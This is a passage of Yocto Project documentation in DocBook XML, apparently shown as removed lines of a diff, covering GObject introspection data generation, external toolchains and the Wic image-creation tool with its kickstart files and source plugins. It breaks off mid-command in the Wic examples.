- GObject introspection is the only way to do it.
- </para>
-
- <para>
- This section describes the Yocto Project support for generating
- and packaging GObject introspection data.
- GObject introspection data is a description of the
- API provided by libraries built on top of GLib framework,
- and, in particular, that framework's GObject mechanism.
- GObject Introspection Repository (GIR) files go to
- <filename>-dev</filename> packages,
- <filename>typelib</filename> files go to main packages as they
- are packaged together with libraries that are introspected.
- </para>
-
- <para>
- The data is generated when building such a library, by linking
- the library with a small executable binary that asks the library
- to describe itself, and then executing the binary and
- processing its output.
- </para>
-
- <para>
- Generating this data in a cross-compilation environment
- is difficult because the library is produced for the target
- architecture, but its code needs to be executed on the build host.
- This problem is solved with the OpenEmbedded build system by
- running the code through QEMU, which allows precisely that.
- Unfortunately, QEMU does not always work perfectly as mentioned
- in the
- "<link linkend='known-issues'>Known Issues</link>" section.
- </para>
-
- <section id='enabling-the-generation-of-introspection-data'>
- <title>Enabling the Generation of Introspection Data</title>
-
- <para>
- Enabling the generation of introspection data (GIR files)
- in your library package involves the following:
- <orderedlist>
- <listitem><para>
- Inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-gobject-introspection'><filename>gobject-introspection</filename></ulink>
- class.
- </para></listitem>
- <listitem><para>
- Make sure introspection is not disabled anywhere in
- the recipe or from anything the recipe includes.
- Also, make sure that "gobject-introspection-data" is
- not in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>
- and that "qemu-usermode" is not in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
- If either of these conditions exist, nothing will
- happen.
- </para></listitem>
- <listitem><para>
- Try to build the recipe.
- If you encounter build errors that look like
- something is unable to find
- <filename>.so</filename> libraries, check where these
- libraries are located in the source tree and add
- the following to the recipe:
- <literallayout class='monospaced'>
- GIR_EXTRA_LIBS_PATH = "${B}/<replaceable>something</replaceable>/.libs"
- </literallayout>
- <note>
- See recipes in the <filename>oe-core</filename>
- repository that use that
- <filename>GIR_EXTRA_LIBS_PATH</filename> variable
- as an example.
- </note>
- </para></listitem>
- <listitem><para>
- Look for any other errors, which probably mean that
- introspection support in a package is not entirely
- standard, and thus breaks down in a cross-compilation
- environment.
- For such cases, custom-made fixes are needed.
- A good place to ask and receive help in these cases
- is the
- <ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Yocto Project mailing lists</ulink>.
- </para></listitem>
- </orderedlist>
- <note>
- Using a library that no longer builds against the latest
- Yocto Project release and prints introspection related
- errors is a good candidate for the previous procedure.
- </note>
- </para>
- </section>
-
- <section id='disabling-the-generation-of-introspection-data'>
- <title>Disabling the Generation of Introspection Data</title>
-
- <para>
- You might find that you do not want to generate
- introspection data.
- Or, perhaps QEMU does not work on your build host and
- target architecture combination.
- If so, you can use either of the following methods to
- disable GIR file generations:
- <itemizedlist>
- <listitem><para>
- Add the following to your distro configuration:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_BACKFILL_CONSIDERED = "gobject-introspection-data"
- </literallayout>
- Adding this statement disables generating
- introspection data using QEMU but will still enable
- building introspection tools and libraries
- (i.e. building them does not require the use of QEMU).
- </para></listitem>
- <listitem><para>
- Add the following to your machine configuration:
- <literallayout class='monospaced'>
- MACHINE_FEATURES_BACKFILL_CONSIDERED = "qemu-usermode"
- </literallayout>
- Adding this statement disables the use of QEMU
- when building packages for your machine.
- Currently, this feature is used only by introspection
- recipes and has the same effect as the previously
- described option.
- <note>
- Future releases of the Yocto Project might have
- other features affected by this option.
- </note>
- </para></listitem>
- </itemizedlist>
- If you disable introspection data, you can still
- obtain it through other means such as copying the data
- from a suitable sysroot, or by generating it on the
- target hardware.
- The OpenEmbedded build system does not currently
- provide specific support for these techniques.
- </para>
- </section>
-
- <section id='testing-that-introspection-works-in-an-image'>
- <title>Testing that Introspection Works in an Image</title>
-
- <para>
- Use the following procedure to test if generating
- introspection data is working in an image:
- <orderedlist>
- <listitem><para>
- Make sure that "gobject-introspection-data" is not in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>
- and that "qemu-usermode" is not in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
- </para></listitem>
- <listitem><para>
- Build <filename>core-image-sato</filename>.
- </para></listitem>
- <listitem><para>
- Launch a Terminal and then start Python in the
- terminal.
- </para></listitem>
- <listitem><para>
- Enter the following in the terminal:
- <literallayout class='monospaced'>
- >>> from gi.repository import GLib
- >>> GLib.get_host_name()
- </literallayout>
- </para></listitem>
- <listitem><para>
- For something a little more advanced, enter the
- following:
- <literallayout class='monospaced'>
- http://python-gtk-3-tutorial.readthedocs.org/en/latest/introduction.html
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='known-issues'>
- <title>Known Issues</title>
-
- <para>
- The following know issues exist for
- GObject Introspection Support:
- <itemizedlist>
- <listitem><para>
- <filename>qemu-ppc64</filename> immediately crashes.
- Consequently, you cannot build introspection data on
- that architecture.
- </para></listitem>
- <listitem><para>
- x32 is not supported by QEMU.
- Consequently, introspection data is disabled.
- </para></listitem>
- <listitem><para>
- musl causes transient GLib binaries to crash on
- assertion failures.
- Consequently, generating introspection data is
- disabled.
- </para></listitem>
- <listitem><para>
- Because QEMU is not able to run the binaries correctly,
- introspection is disabled for some specific packages
- under specific architectures (e.g.
- <filename>gcr</filename>,
- <filename>libsecret</filename>, and
- <filename>webkit</filename>).
- </para></listitem>
- <listitem><para>
- QEMU usermode might not work properly when running
- 64-bit binaries under 32-bit host machines.
- In particular, "qemumips64" is known to not work under
- i686.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='dev-optionally-using-an-external-toolchain'>
- <title>Optionally Using an External Toolchain</title>
-
- <para>
- You might want to use an external toolchain as part of your
- development.
- If this is the case, the fundamental steps you need to accomplish
- are as follows:
- <itemizedlist>
- <listitem><para>
- Understand where the installed toolchain resides.
- For cases where you need to build the external toolchain,
- you would need to take separate steps to build and install
- the toolchain.
- </para></listitem>
- <listitem><para>
- Make sure you add the layer that contains the toolchain to
- your <filename>bblayers.conf</filename> file through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- Set the <filename>EXTERNAL_TOOLCHAIN</filename>
- variable in your <filename>local.conf</filename> file
- to the location in which you installed the toolchain.
- </para></listitem>
- </itemizedlist>
- A good example of an external toolchain used with the Yocto Project
- is <trademark class='registered'>Mentor Graphics</trademark>
- Sourcery G++ Toolchain.
- You can see information on how to use that particular layer in the
- <filename>README</filename> file at
- <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
- You can find further information by reading about the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TCMODE'><filename>TCMODE</filename></ulink>
- variable in the Yocto Project Reference Manual's variable glossary.
- </para>
- </section>
-
- <section id='creating-partitioned-images-using-wic'>
- <title>Creating Partitioned Images Using Wic</title>
-
- <para>
- Creating an image for a particular hardware target using the
- OpenEmbedded build system does not necessarily mean you can boot
- that image as is on your device.
- Physical devices accept and boot images in various ways depending
- on the specifics of the device.
- Usually, information about the hardware can tell you what image
- format the device requires.
- Should your device require multiple partitions on an SD card, flash,
- or an HDD, you can use the OpenEmbedded Image Creator,
- Wic, to create the properly partitioned image.
- </para>
-
- <para>
- The <filename>wic</filename> command generates partitioned
- images from existing OpenEmbedded build artifacts.
- Image generation is driven by partitioning commands
- contained in an Openembedded kickstart file
- (<filename>.wks</filename>) specified either directly on
- the command line or as one of a selection of canned
- kickstart files as shown with the
- <filename>wic list images</filename> command in the
- "<link linkend='using-a-provided-kickstart-file'>Using an Existing Kickstart File</link>"
- section.
- When you apply the command to a given set of build
- artifacts, the result is an image or set of images that
- can be directly written onto media and used on a particular
- system.
- <note>
- For a kickstart file reference, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</ulink>"
- Chapter in the Yocto Project Reference Manual.
- </note>
- </para>
-
- <para>
- The <filename>wic</filename> command and the infrastructure
- it is based on is by definition incomplete.
- The purpose of the command is to allow the generation of
- customized images, and as such, was designed to be
- completely extensible through a plugin interface.
- See the
- "<link linkend='wic-using-the-wic-plugin-interface'>Using the Wic PlugIn Interface</link>"
- section for information on these plugins.
- </para>
-
- <para>
- This section provides some background information on Wic,
- describes what you need to have in
- place to run the tool, provides instruction on how to use
- the Wic utility, provides information on using the Wic plugins
- interface, and provides several examples that show how to use
- Wic.
- </para>
-
- <section id='wic-background'>
- <title>Background</title>
-
- <para>
- This section provides some background on the Wic utility.
- While none of this information is required to use
- Wic, you might find it interesting.
- <itemizedlist>
- <listitem><para>
- The name "Wic" is derived from OpenEmbedded
- Image Creator (oeic).
- The "oe" diphthong in "oeic" was promoted to the
- letter "w", because "oeic" is both difficult to
- remember and to pronounce.
- </para></listitem>
- <listitem><para>
- Wic is loosely based on the
- Meego Image Creator (<filename>mic</filename>)
- framework.
- The Wic implementation has been
- heavily modified to make direct use of OpenEmbedded
- build artifacts instead of package installation and
- configuration, which are already incorporated within
- the OpenEmbedded artifacts.
- </para></listitem>
- <listitem><para>
- Wic is a completely independent
- standalone utility that initially provides
- easier-to-use and more flexible replacements for an
- existing functionality in OE-Core's
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image-live'><filename>image-live</filename></ulink>
- class.
- The difference between Wic and those examples is
- that with Wic the functionality of those scripts is
- implemented by a general-purpose partitioning language,
- which is based on Redhat kickstart syntax.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='wic-requirements'>
- <title>Requirements</title>
-
- <para>
- In order to use the Wic utility with the OpenEmbedded Build
- system, your system needs to meet the following
- requirements:
- <itemizedlist>
- <listitem><para>
- The Linux distribution on your development host must
- support the Yocto Project.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>"
- section in the Yocto Project Reference Manual for
- the list of distributions that support the
- Yocto Project.
- </para></listitem>
- <listitem><para>
- The standard system utilities, such as
- <filename>cp</filename>, must be installed on your
- development host system.
- </para></listitem>
- <listitem><para>
- You must have sourced the build environment
- setup script (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>)
- found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para></listitem>
- <listitem><para>
- You need to have the build artifacts already
- available, which typically means that you must
- have already created an image using the
- Openembedded build system (e.g.
- <filename>core-image-minimal</filename>).
- While it might seem redundant to generate an image
- in order to create an image using
- Wic, the current version of
- Wic requires the artifacts
- in the form generated by the OpenEmbedded build
- system.
- </para></listitem>
- <listitem><para>
- You must build several native tools, which are
- built to run on the build system:
- <literallayout class='monospaced'>
- $ bitbake parted-native dosfstools-native mtools-native
- </literallayout>
- </para></listitem>
- <listitem><para>
- Include "wic" as part of the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- Include the name of the
- <ulink url='&YOCTO_DOCS_REF_URL;#openembedded-kickstart-wks-reference'>wic kickstart file</ulink>
- as part of the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE'><filename>WKS_FILE</filename></ulink>
- variable
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='wic-getting-help'>
- <title>Getting Help</title>
-
- <para>
- You can get general help for the <filename>wic</filename>
- command by entering the <filename>wic</filename> command
- by itself or by entering the command with a help argument
- as follows:
- <literallayout class='monospaced'>
- $ wic -h
- $ wic --help
- $ wic help
- </literallayout>
- </para>
-
- <para>
- Currently, Wic supports seven commands:
- <filename>cp</filename>, <filename>create</filename>,
- <filename>help</filename>, <filename>list</filename>,
- <filename>ls</filename>, <filename>rm</filename>, and
- <filename>write</filename>.
- You can get help for all these commands except "help" by
- using the following form:
- <literallayout class='monospaced'>
- $ wic help <replaceable>command</replaceable>
- </literallayout>
- For example, the following command returns help for the
- <filename>write</filename> command:
- <literallayout class='monospaced'>
- $ wic help write
- </literallayout>
- </para>
-
- <para>
- Wic supports help for three topics:
- <filename>overview</filename>,
- <filename>plugins</filename>, and
- <filename>kickstart</filename>.
- You can get help for any topic using the following form:
- <literallayout class='monospaced'>
- $ wic help <replaceable>topic</replaceable>
- </literallayout>
- For example, the following returns overview help for Wic:
- <literallayout class='monospaced'>
- $ wic help overview
- </literallayout>
- </para>
-
- <para>
- One additional level of help exists for Wic.
- You can get help on individual images through the
- <filename>list</filename> command.
- You can use the <filename>list</filename> command to return the
- available Wic images as follows:
- <literallayout class='monospaced'>
- $ wic list images
- genericx86 Create an EFI disk image for genericx86*
- beaglebone-yocto Create SD card image for Beaglebone
- edgerouter Create SD card image for Edgerouter
- qemux86-directdisk Create a qemu machine 'pcbios' direct disk image
- directdisk-gpt Create a 'pcbios' direct disk image
- mkefidisk Create an EFI disk image
- directdisk Create a 'pcbios' direct disk image
- systemd-bootdisk Create an EFI disk image with systemd-boot
- mkhybridiso Create a hybrid ISO image
- sdimage-bootpart Create SD card image with a boot partition
- directdisk-multi-rootfs Create multi rootfs image using rootfs plugin
- directdisk-bootloader-config Create a 'pcbios' direct disk image with custom bootloader config
- </literallayout>
- Once you know the list of available Wic images, you can use
- <filename>help</filename> with the command to get help on a
- particular image.
- For example, the following command returns help on the
- "beaglebone-yocto" image:
- <literallayout class='monospaced'>
- $ wic list beaglebone-yocto help
-
-
- Creates a partitioned SD card image for Beaglebone.
- Boot files are located in the first vfat partition.
- </literallayout>
- </para>
- </section>
-
- <section id='operational-modes'>
- <title>Operational Modes</title>
-
- <para>
- You can use Wic in two different
- modes, depending on how much control you need for
- specifying the Openembedded build artifacts that are
- used for creating the image: Raw and Cooked:
- <itemizedlist>
- <listitem><para>
- <emphasis>Raw Mode:</emphasis>
- You explicitly specify build artifacts through
- Wic command-line arguments.
- </para></listitem>
- <listitem><para>
- <emphasis>Cooked Mode:</emphasis>
- The current
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- setting and image name are used to automatically
- locate and provide the build artifacts.
- You just supply a kickstart file and the name
- of the image from which to use artifacts.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Regardless of the mode you use, you need to have the build
- artifacts ready and available.
- </para>
-
- <section id='raw-mode'>
- <title>Raw Mode</title>
-
- <para>
- Running Wic in raw mode allows you to specify all the
- partitions through the <filename>wic</filename>
- command line.
- The primary use for raw mode is if you have built
- your kernel outside of the Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- In other words, you can point to arbitrary kernel,
- root filesystem locations, and so forth.
- Contrast this behavior with cooked mode where Wic
- looks in the Build Directory (e.g.
- <filename>tmp/deploy/images/</filename><replaceable>machine</replaceable>).
- </para>
-
- <para>
- The general form of the
- <filename>wic</filename> command in raw mode is:
- <literallayout class='monospaced'>
- $ wic create <replaceable>wks_file</replaceable> <replaceable>options</replaceable> ...
-
- Where:
-
- <replaceable>wks_file</replaceable>:
- An OpenEmbedded kickstart file. You can provide
- your own custom file or use a file from a set of
- existing files as described by further options.
-
- optional arguments:
- -h, --help show this help message and exit
- -o <replaceable>OUTDIR</replaceable>, --outdir <replaceable>OUTDIR</replaceable>
- name of directory to create image in
- -e <replaceable>IMAGE_NAME</replaceable>, --image-name <replaceable>IMAGE_NAME</replaceable>
- name of the image to use the artifacts from e.g. core-
- image-sato
- -r <replaceable>ROOTFS_DIR</replaceable>, --rootfs-dir <replaceable>ROOTFS_DIR</replaceable>
- path to the /rootfs dir to use as the .wks rootfs
- source
- -b <replaceable>BOOTIMG_DIR</replaceable>, --bootimg-dir <replaceable>BOOTIMG_DIR</replaceable>
- path to the dir containing the boot artifacts (e.g.
- /EFI or /syslinux dirs) to use as the .wks bootimg
- source
- -k <replaceable>KERNEL_DIR</replaceable>, --kernel-dir <replaceable>KERNEL_DIR</replaceable>
- path to the dir containing the kernel to use in the
- .wks bootimg
- -n <replaceable>NATIVE_SYSROOT</replaceable>, --native-sysroot <replaceable>NATIVE_SYSROOT</replaceable>
- path to the native sysroot containing the tools to use
- to build the image
- -s, --skip-build-check
- skip the build check
- -f, --build-rootfs build rootfs
- -c {gzip,bzip2,xz}, --compress-with {gzip,bzip2,xz}
- compress image with specified compressor
- -m, --bmap generate .bmap
- --no-fstab-update Do not change fstab file.
- -v <replaceable>VARS_DIR</replaceable>, --vars <replaceable>VARS_DIR</replaceable>
- directory with &lt;image&gt;.env files that store bitbake
- variables
- -D, --debug output debug information
- </literallayout>
- <note>
- You do not need root privileges to run
- Wic.
- In fact, you should not run as root when using the
- utility.
- </note>
- </para>
- </section>
-
- <section id='cooked-mode'>
- <title>Cooked Mode</title>
-
- <para>
- Running Wic in cooked mode leverages off artifacts in
- the Build Directory.
- In other words, you do not have to specify kernel or
- root filesystem locations as part of the command.
- All you need to provide is a kickstart file and the
- name of the image from which to use artifacts by using
- the "-e" option.
- Wic looks in the Build Directory (e.g.
- <filename>tmp/deploy/images/</filename><replaceable>machine</replaceable>)
- for artifacts.
- </para>
-
- <para>
- The general form of the <filename>wic</filename>
- command using Cooked Mode is as follows:
- <literallayout class='monospaced'>
- $ wic create <replaceable>wks_file</replaceable> -e <replaceable>IMAGE_NAME</replaceable>
-
- Where:
-
- <replaceable>wks_file</replaceable>:
- An OpenEmbedded kickstart file. You can provide
- your own custom file or use a file from a set of
- existing files provided with the Yocto Project
- release.
-
- required argument:
- -e <replaceable>IMAGE_NAME</replaceable>, --image-name <replaceable>IMAGE_NAME</replaceable>
- name of the image to use the artifacts from e.g. core-
- image-sato
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='using-a-provided-kickstart-file'>
- <title>Using an Existing Kickstart File</title>
-
- <para>
- If you do not want to create your own kickstart file, you
- can use an existing file provided by the Wic installation.
- As shipped, kickstart files can be found in the
- Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- in the following two locations:
- <literallayout class='monospaced'>
- poky/meta-yocto-bsp/wic
- poky/scripts/lib/wic/canned-wks
- </literallayout>
- Use the following command to list the available kickstart
- files:
- <literallayout class='monospaced'>
- $ wic list images
- genericx86 Create an EFI disk image for genericx86*
- beaglebone-yocto Create SD card image for Beaglebone
- edgerouter Create SD card image for Edgerouter
- qemux86-directdisk Create a qemu machine 'pcbios' direct disk image
- directdisk-gpt Create a 'pcbios' direct disk image
- mkefidisk Create an EFI disk image
- directdisk Create a 'pcbios' direct disk image
- systemd-bootdisk Create an EFI disk image with systemd-boot
- mkhybridiso Create a hybrid ISO image
- sdimage-bootpart Create SD card image with a boot partition
- directdisk-multi-rootfs Create multi rootfs image using rootfs plugin
- directdisk-bootloader-config Create a 'pcbios' direct disk image with custom bootloader config
- </literallayout>
- When you use an existing file, you do not have to use the
- <filename>.wks</filename> extension.
- Here is an example in Raw Mode that uses the
- <filename>directdisk</filename> file:
- <literallayout class='monospaced'>
- $ wic create directdisk -r <replaceable>rootfs_dir</replaceable> -b <replaceable>bootimg_dir</replaceable> \
- -k <replaceable>kernel_dir</replaceable> -n <replaceable>native_sysroot</replaceable>
- </literallayout>
- </para>
-
- <para>
- Here are the actual partition language commands
- used in the <filename>genericx86.wks</filename> file to
- generate an image:
- <literallayout class='monospaced'>
- # short-description: Create an EFI disk image for genericx86*
- # long-description: Creates a partitioned EFI disk image for genericx86* machines
- part /boot --source bootimg-efi --sourceparams="loader=grub-efi" --ondisk sda --label msdos --active --align 1024
- part / --source rootfs --ondisk sda --fstype=ext4 --label platform --align 1024 --use-uuid
- part swap --ondisk sda --size 44 --label swap1 --fstype=swap
-
- bootloader --ptable gpt --timeout=5 --append="rootfstype=ext4 console=ttyS0,115200 console=tty0"
- </literallayout>
- </para>
- </section>
-
- <section id='wic-using-the-wic-plugin-interface'>
- <title>Using the Wic Plugin Interface</title>
-
- <para>
- You can extend and specialize Wic functionality by using
- Wic plugins.
- This section explains the Wic plugin interface.
- <note>
- Wic plugins consist of "source" and "imager" plugins.
- Imager plugins are beyond the scope of this section.
- </note>
- </para>
-
- <para>
- Source plugins provide a mechanism to customize partition
- content during the Wic image generation process.
- You can use source plugins to map values that you specify
- using <filename>--source</filename> commands in kickstart
- files (i.e. <filename>*.wks</filename>) to a plugin
- implementation used to populate a given partition.
- <note>
- If you use plugins that have build-time dependencies
- (e.g. native tools, bootloaders, and so forth)
- when building a Wic image, you need to specify those
- dependencies using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE_DEPENDS'><filename>WKS_FILE_DEPENDS</filename></ulink>
- variable.
- </note>
- </para>
-
- <para>
- Source plugins are subclasses defined in plugin files.
- As shipped, the Yocto Project provides several plugin
- files.
- You can see the source plugin files that ship with the
- Yocto Project
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/scripts/lib/wic/plugins/source'>here</ulink>.
- Each of these plugin files contains source plugins that
- are designed to populate a specific Wic image partition.
- </para>
-
- <para>
- Source plugins are subclasses of the
- <filename>SourcePlugin</filename> class, which is
- defined in the
- <filename>poky/scripts/lib/wic/pluginbase.py</filename>
- file.
- For example, the <filename>BootimgEFIPlugin</filename>
- source plugin found in the
- <filename>bootimg-efi.py</filename> file is a subclass of
- the <filename>SourcePlugin</filename> class, which is found
- in the <filename>pluginbase.py</filename> file.
- </para>
-
- <para>
- You can also implement source plugins in a layer outside
- of the Source Repositories (external layer).
- To do so, be sure that your plugin files are located in
- a directory whose path is
- <filename>scripts/lib/wic/plugins/source/</filename>
- within your external layer.
- When the plugin files are located there, the source
- plugins they contain are made available to Wic.
- </para>
-
- <para>
- When the Wic implementation needs to invoke a
- partition-specific implementation, it looks for the plugin
- with the same name as the <filename>--source</filename>
- parameter used in the kickstart file given to that
- partition.
- For example, if the partition is set up using the following
- command in a kickstart file:
- <literallayout class='monospaced'>
- part /boot --source bootimg-pcbios --ondisk sda --label boot --active --align 1024
- </literallayout>
- The methods defined as class members of the matching
- source plugin (i.e. <filename>bootimg-pcbios</filename>)
- in the <filename>bootimg-pcbios.py</filename> plugin file
- are used.
- </para>
-
- <para>
- To be more concrete, here is the corresponding plugin
- definition from the <filename>bootimg-pcbios.py</filename>
- file for the previous command along with an example
- method called by the Wic implementation when it needs to
- prepare a partition using an implementation-specific
- function:
- <literallayout class='monospaced'>
- .
- .
- .
- class BootimgPcbiosPlugin(SourcePlugin):
- """
- Create MBR boot partition and install syslinux on it.
- """
-
- name = 'bootimg-pcbios'
- .
- .
- .
- @classmethod
- def do_prepare_partition(cls, part, source_params, creator, cr_workdir,
- oe_builddir, bootimg_dir, kernel_dir,
- rootfs_dir, native_sysroot):
- """
- Called to do the actual content population for a partition i.e. it
- 'prepares' the partition to be incorporated into the image.
- In this case, prepare content for legacy bios boot partition.
- """
- .
- .
- .
- </literallayout>
- If a subclass (plugin) itself does not implement a
- particular function, Wic locates and uses the default
- version in the superclass.
- It is for this reason that all source plugins are derived
- from the <filename>SourcePlugin</filename> class.
- </para>
-
- <para>
- The <filename>SourcePlugin</filename> class defined in
- the <filename>pluginbase.py</filename> file defines
- a set of methods that source plugins can implement or
- override.
- Any plugins (subclass of
- <filename>SourcePlugin</filename>) that do not implement
- a particular method inherit the implementation of the
- method from the <filename>SourcePlugin</filename> class.
- For more information, see the
- <filename>SourcePlugin</filename> class in the
- <filename>pluginbase.py</filename> file for details:
- </para>
-
- <para>
- The following list describes the methods implemented in the
- <filename>SourcePlugin</filename> class:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>do_prepare_partition()</filename>:</emphasis>
- Called to populate a partition with actual content.
- In other words, the method prepares the final
- partition image that is incorporated into the
- disk image.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_configure_partition()</filename>:</emphasis>
- Called before
- <filename>do_prepare_partition()</filename> to
- create custom configuration files for a partition
- (e.g. syslinux or grub configuration files).
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_install_disk()</filename>:</emphasis>
- Called after all partitions have been prepared and
- assembled into a disk image.
- This method provides a hook to allow finalization
- of a disk image (e.g. writing an MBR).
- </para></listitem>
- <listitem><para>
- <emphasis><filename>do_stage_partition()</filename>:</emphasis>
- Special content-staging hook called before
- <filename>do_prepare_partition()</filename>.
- This method is normally empty.</para>
-
- <para>Typically, a partition just uses the passed-in
- parameters (e.g. the unmodified value of
- <filename>bootimg_dir</filename>).
- However, in some cases, things might need to be
- more tailored.
- As an example, certain files might additionally
- need to be taken from
- <filename>bootimg_dir + /boot</filename>.
- This hook allows those files to be staged in a
- customized fashion.
- <note>
- <filename>get_bitbake_var()</filename>
- allows you to access non-standard variables
- that you might want to use for this
- behavior.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can extend the source plugin mechanism.
- To add more hooks, create more source plugin methods
- within <filename>SourcePlugin</filename> and the
- corresponding derived subclasses.
- The code that calls the plugin methods uses the
- <filename>plugin.get_source_plugin_methods()</filename>
- function to find the method or methods needed by the call.
- Retrieval of those methods is accomplished by filling up
- a dict with keys that contain the method names of interest.
- On success, these will be filled in with the actual
- methods.
- See the Wic implementation for examples and details.
- </para>
- </section>
-
- <section id='wic-usage-examples'>
- <title>Examples</title>
-
- <para>
- This section provides several examples that show how to use
- the Wic utility.
- All the examples assume the list of requirements in the
- "<link linkend='wic-requirements'>Requirements</link>"
- section have been met.
- The examples assume the previously generated image is
- <filename>core-image-minimal</filename>.
- </para>
-
- <section id='generate-an-image-using-a-provided-kickstart-file'>
- <title>Generate an Image using an Existing Kickstart File</title>
-
- <para>
- This example runs in Cooked Mode and uses the
- <filename>mkefidisk</filename> kickstart file:
- <literallayout class='monospaced'>
- $ wic create mkefidisk -e core-image-minimal
- INFO: Building wic-tools...
- .
- .
- .
- INFO: The new image(s) can be found here:
- ./mkefidisk-201804191017-sda.direct
-
- The following build artifacts were used to create the image(s):
- ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
- BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
- KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
- NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
- INFO: The image(s) were created using OE kickstart file:
- /home/stephano/build/master/openembedded-core/scripts/lib/wic/canned-wks/mkefidisk.wks
- </literallayout>
- The previous example shows the easiest way to create
- an image by running in cooked mode and supplying
- a kickstart file and the "-e" option to point to the
- existing build artifacts.
- Your <filename>local.conf</filename> file needs to have
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable set to the machine you are using, which is
- "qemux86" in this example.
- </para>
-
- <para>
- Once the image builds, the output provides image
- location, artifact use, and kickstart file information.
- <note>
- You should always verify the details provided in the
- output to make sure that the image was indeed
- created exactly as expected.
- </note>
- </para>
-
- <para>
- Continuing with the example, you can now write the
- image from the Build Directory onto a USB stick, or
- whatever media for which you built your image, and boot
- from the media.
- You can write the image by using
- <filename>bmaptool</filename> or
- <filename>dd</filename>:
- <literallayout class='monospaced'>
- $ oe-run-native bmaptool copy mkefidisk-201804191017-sda.direct /dev/sd<replaceable>X</replaceable>
- </literallayout>
- or
- <literallayout class='monospaced'>
- $ sudo dd if=mkefidisk-201804191017-sda.direct of=/dev/sd<replaceable>X</replaceable>
- </literallayout>
- <note>
- For more information on how to use the
- <filename>bmaptool</filename> to flash a device
- with an image, see the
- "<link linkend='flashing-images-using-bmaptool'>Flashing Images Using <filename>bmaptool</filename></link>"
- section.
- </note>
- </para>
- </section>
-
- <section id='using-a-modified-kickstart-file'>
- <title>Using a Modified Kickstart File</title>
-
- <para>
- Because partitioned image creation is driven by the
- kickstart file, it is easy to affect image creation by
- changing the parameters in the file.
- This next example demonstrates that through modification
- of the <filename>directdisk-gpt</filename> kickstart
- file.
- </para>
-
- <para>
- As mentioned earlier, you can use the command
- <filename>wic list images</filename> to show the list
- of existing kickstart files.
- The directory in which the
- <filename>directdisk-gpt.wks</filename> file resides is
- <filename>scripts/lib/image/canned-wks/</filename>,
- which is located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>).
- Because available files reside in this directory,
- you can create and add your own custom files to the
- directory.
- Subsequent use of the
- <filename>wic list images</filename> command would then
- include your kickstart files.
- </para>
-
- <para>
- In this example, the existing
- <filename>directdisk-gpt</filename> file already does
- most of what is needed.
- However, for the hardware in this example, the image
- will need to boot from <filename>sdb</filename> instead
- of <filename>sda</filename>, which is what the
- <filename>directdisk-gpt</filename> kickstart file
- uses.
- </para>
-
- <para>
- The example begins by making a copy of the
- <filename>directdisk-gpt.wks</filename> file in the
- <filename>scripts/lib/image/canned-wks</filename>
- directory and then by changing the lines that specify
- the target disk from which to boot.
- <literallayout class='monospaced'>
- $ cp /home/stephano/poky/scripts/lib/wic/canned-wks/directdisk-gpt.wks \
